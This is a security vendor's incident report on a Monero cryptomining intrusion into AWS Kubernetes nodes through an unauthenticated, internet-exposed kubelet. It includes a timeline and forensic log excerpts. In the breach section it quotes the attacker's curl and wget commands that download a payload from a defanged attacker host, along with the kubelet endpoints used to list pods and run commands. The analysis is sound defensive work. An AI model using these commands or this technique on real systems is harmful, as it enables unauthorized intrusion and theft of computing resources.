Alert Logic Container IDS Solution Detects Cryptomining Attack on AWS

Executive Summary

On the April 4, 2018, an incident was raised by an analyst in our SOC (security operations center) for one of our newly-provisioned customers, indicating they were hosting a cryptomining threat that targets the Monero cryptocurrency. The attack was identified via the threat detection capabilities of the beta version of our Alert Logic container intrusion detection system solution for containerized environments, which had detected strings indicative of Monero cryptocurrency passing across the network. A container within the customer environment had been breached before we provisioned the container solution, and was hosting this cryptominer. 

Our investigation determined that the exploit was achieved via a wget command, executed by an attacker in China (IP: 116.211.143.90), via an open AWS security Group (0.0.0.0), which had been applied to the Kubernetes nodes in question. Kubernetes nodes exposed to the open internet in this way are known to have an unauthenticated RCE (remote code execution) capability, which was disclosed by external security researchers on March 13, 2018, in a blog post on Medium

The AWS security group had been applied to the Kubernetes nodes as of February 22, 2018. Upon subsequent inspection of AWS CloudTrail logs, IDS events and kubelet (internal Kubernetes logs) supplied by the customer to Alert Logic, it was identified that at least 4 different nodes had been breached in the same way since the security group was applied:

  • Node 1 – April 3
  • Node 2 – March 8
  • Node 3 – March 8
  • Node 4 – April 4

Only the Node 4 and Node 1 security breaches in this chain were caught, as these were the only nodes breached after our container IDS solution was provisioned. Nodes 2 and 3 were identified as having been breached previously using the historical logs supplied by the customer. 

Using logs available, since February 22, for each node we see repeated attempts to execute wget and curl commands, but these fail in all cases since the containers being targeted do not contain these commands. The nodes were breached in each case by exploiting an intermittently-deployed container, which had wget installed. Each time, the node was breached by the same Chinese IP (which posts back to a .ru address).

At present we do not believe there to be any reason to expect that the cyber attacker was able to gain more permanent or persistent access to the AWS account and the remediation of closing the security group and deleting all Kubernetes nodes (as of late April 4) is likely to have been sufficient to remove the detected threat.

Timeline of the Cyber Attack

Date

Nodes Affected

Activity

Dec-20-2017

Nodes 2, 3 and 4

Created

Feb-13-2018

n/a

Monero miner incident detection released by Alert Logic to customers

Feb-22-2018

Nodes 2, 3 and 4

Open SG applied to nodes in cluster

Mar-6-2018

Node 3

First see scanning for open nodes; activity expected from medium blog

Mar-7-2018

Node 2

First see scanning for open nodes; activity expected from medium blog

Mar-8-2018 (16:12:56)

Node 3

Vulnerable pod started

Mar-8-2018 (16:12:57)

Node 2

Vulnerable pod started

Mar-8-2018 (16:40:52)

Node 2

Breached with miner; activity expected from medium blog

Mar-8-2018 (16:40:55)

Node 3

Breached with miner; activity expected from medium blog

Mar-13-2018

n/a

Medium blog released; in response to observed kubernetes breach

Mar-29-2018

Node 1

Created (inherits open SG)

Apr-3-2018 (15:42:07)

Node 1

Vulnerable pod started

Apr-3-2018 (15:42:08)

Node 4

Vulnerable pod started

Apr-3-2018 (19:37:10)

Node 1

Breached with miner; activity expected from medium blog

Apr-3-2018 (19:37:16)

Node 1???

Incident raised to SOC. Linked to Node 1 due to timestamp in event

Apr-4-2018 (08:24:31)

Node 4

Breached with miner; activity expected from medium blog

Apr-4-2018 (08:24:39)

Node 4???

Incident raised to SOC. Linked to Node 4 due to timestamp in event

Evidence of the Security Breach

Recon

Upon opening up the security group for the affected nodes, we were able to establish routine scanning activity in the kubelet logs as of March 6.

  • Mar  6 07:44:53 ip-172-20-59-158 kubelet[1223]: I0306 07:44:53.317031    1223 server.go:779] GET /runningpods: (21.334µs) 301 [[python-requests/2.7.0 CPython/2.7.9 Windows/2003Server] 222.186.21.69:1878]
  • Mar  6 07:44:53 ip-172-20-59-158 kubelet[1223]: I0306 07:44:53.592510    1223 server.go:779] GET /runningpods/: (2.770017ms) 200 [[python-requests/2.7.0 CPython/2.7.9 Windows/2003Server] 222.186.21.69:1878]

The logs in this instance demonstrate the request for runningpods which was successful due to the return of a 200 status code. We do not have any data on what precise information was supplied to the attacker from these requests, but we do know it supplied a list of containers which were available on the host (as this is the function of the request).

This could be considered to be a successful information disclosure in each instance, as Kubernetes is NOT expected to have this capability accessible to the open internet because it is unauthenticated and no authentication is possible.

Key Aspects of the Breach

Once recon has identified the lists of containers which are available, the attacker uses curl to attempt to execute commands on the containers. The logs which demonstrate these attempts are below:

  • Apr  3 19:39:17 ip-172-20-87-182 kubelet[1232]: [[curl/7.29.0] 116.211.143.90:50100]
  • Apr  3 19:39:23 ip-172-20-87-182 kubelet[1232]: [[curl/7.29.0] 116.211.143.90:50202]
  • Apr  3 19:39:30 ip-172-20-87-182 kubelet[1232]: [[curl/7.29.0] 116.211.143.90:50284]
  • Apr  3 19:39:37 ip-172-20-87-182 kubelet[1232]: [[curl/7.29.0] 116.211.143.90:50368]

Additional information on the error logs generated by these requests are contained below:

  • Apr  3 19:39:17 ip-172-20-87-182 dockerd[1369]: time="2018-04-03T19:39:17.666331830Z" level=error msg="Error running exec in container: rpc error: code = 2 desc = oci runtime error: exec failed: container_linux.go:247: starting container process caused \"exec: \\\"curl\\\": executable file not found in $PATH\"\n"
  • Apr  3 19:39:17 ip-172-20-87-182 kubelet[1232]: logging error output: "command 'curl hxxp://chrome.zer0day.ru:5050/mrx -o /tmp/kube.lock' exited with 126: "
  • Apr  3 19:39:17 ip-172-20-87-182 kubelet[1232]: [[curl/7.29.0] 116.211.143.90:50100]

Note the error produced in the kubelet log identifying that the curl command is not available. This log indicates that the command was unsuccessful, but does provide us with the log of the command being used. This command is the link to the Medium blog post as it is functionally identical to the execution represented there. In this instance however, it was unsuccessful. We cannot know which container this was executed on, only that it was a container on Node 1.

Upon successful execution however, we see the following log message:

  • Apr  3 19:37:03 ip-172-20-87-182 kubelet[1232]: logging error output: "command 'wget  hxxp://chrome.zer0day.ru:5050/mrx --no-check-certificate -O /tmp/kube.lock' exited with 1: http://: Invalid host name.\n--2018-04-03 19:37:03--  hxxp://chrome.zer0day.ru:5050/mrx\nResolving chrome.zer0day.ru (chrome.zer0day.ru)... 185.10.68.225\nConnecting to chrome.zer0day.ru (chrome.zer0day.ru)|185.10.68.225|:5050... connected.\nHTTP request sent, awaiting response... 200 OK\nLength: 1643 (1.6K) [application/octet-stream]\nSaving to: '/tmp/kube.lock'\n\n     0K .                                                     100% 2.05M=0.001s\n\n2018-04-03 19:37:03 (2.05 MB/s) - '/tmp/kube.lock' saved [1643/1643]\n\nFINISHED --2018-04-03 19:37:03--\nTotal wall clock time: 0.6s\nDownloaded: 1 files, 1.6K in 0.001s (2.05 MB/s)\n"
  • Apr  3 19:37:03 ip-172-20-87-182 kubelet[1232]: [[curl/7.29.0] 116.211.143.90:42696]

Note that curiously this container (from these logs alone we cannot know which container it was; we establish this by association later) indicates that it has failed due to an invalid hostname. However, it continues to then successfully download the script sourced from the external host. It is unclear how the script is able to execute correctly and also generate an error, and it is pure fortune that this is occurring and thus we see the activity in the log. Were this activity to have been directly successful we would have no evidence of the command, as successful commands are not logged by default.

However, in this instance we can only establish that a successful wget was performed. We need to see the subsequent log messages to identify container level attribution:

  • Apr  3 19:37:10 ip-172-20-87-182 kubelet[1232]: I0403 19:37:10.660382    1232 server.go:779] POST /run/default/[container_specific_path]/[ container_specific_path]: (36.851049ms) 200 [[curl/7.29.0] 116.211.143.90:42900]

Seven seconds after the successful wget which downloads a file (we will discuss the file itself later) we see a POST request to a URI directed at the vulnerable container (redacted in the log above). This is also 6 seconds before the incident is raised to the SOC which demonstrates the node is breached. We cannot know what is being executed in the POST body as this data is not logged, but it is highly likely to have been execution of the cryptominer malware on the system. This then causes the initial external communications, which are caught by our IDS signatures and raise the incident. This is the source of the inference that it is that vulnerable container specifically which was breached and not some other container which then caused lateral movement. Obviously, finding the malicious cryptominer on the vulnerable container itself was the cause of the incident, but we have now established that only and uniquely that one container was breached, and it is “patient zero” for a node in each case.

Payload / Cryptominer analysis

Upon analysis of the cryptominer removed from one of the breached nodes, it was identified as a classic and unaltered version of XMRig. This version of the cryptominer had already been known to Alert Logic Active Intelligence, and was the basis of the original research which produced the incident coverage released on February 13, 2018. This sample also resolved to being identical to the identified sample from the Medium blog.

Random Details about the Cyber Attack

Cryptominer restarts

Node 1 was breached on April 3, according to the log traffic below:

  • Apr  3 19:37:10 ip-172-20-87-182 kubelet[1232]: I0403 19:37:10.660382    1232 server.go:779] POST /run/default/[container_specific_path]/[container_specific_path]: (36.851049ms) 200 [[curl/7.29.0] 116.211.143.90:42900]
  • Apr  3 19:39:17 ip-172-20-87-182 kubelet[1232]: [[curl/7.29.0] 116.211.143.90:50100]
  • Apr  3 19:39:23 ip-172-20-87-182 kubelet[1232]: [[curl/7.29.0] 116.211.143.90:50202]
  • Apr  3 19:39:30 ip-172-20-87-182 kubelet[1232]: [[curl/7.29.0] 116.211.143.90:50284]
  • Apr  3 19:39:37 ip-172-20-87-182 kubelet[1232]: [[curl/7.29.0] 116.211.143.90:50368]

Node 1 was killed on April 4, according to the log traffic below:

  • ./daemon.log:Apr 4 14:21:04 ip-172-20-87-182 kubelet[1232]: I0404 14:21:04.577373 1232 kubelet.go:1871] SyncLoop (PLEG): "[container_specific_path]_default[(longID])", event: &pleg.PodLifecycleEvent{ID:"[longID]", Type:"ContainerDied", Data:"[data]"}

We see an immediate attempt by the attacking IP to restart the cryptominer again, based on the log traffic below:

  • Apr  4 14:21:04 ip-172-20-87-182 kubelet[1232]: I0404 14:21:04.169411    1232 server.go:779] POST /run/default/[container_specific_apth]/[container_specific_path]: (18h43m47.638477556s) 200 [[curl/7.29.0] 116.211.143.90:43130] 

So, within a second of the compromised, cryptomining container being torn down—we see attempts to restart it from the attacking IP. It is likely that the TCP connection being torn down initiated a request from the container to explicitly state it was down. The response is likely to take too long for the timestamps we can see.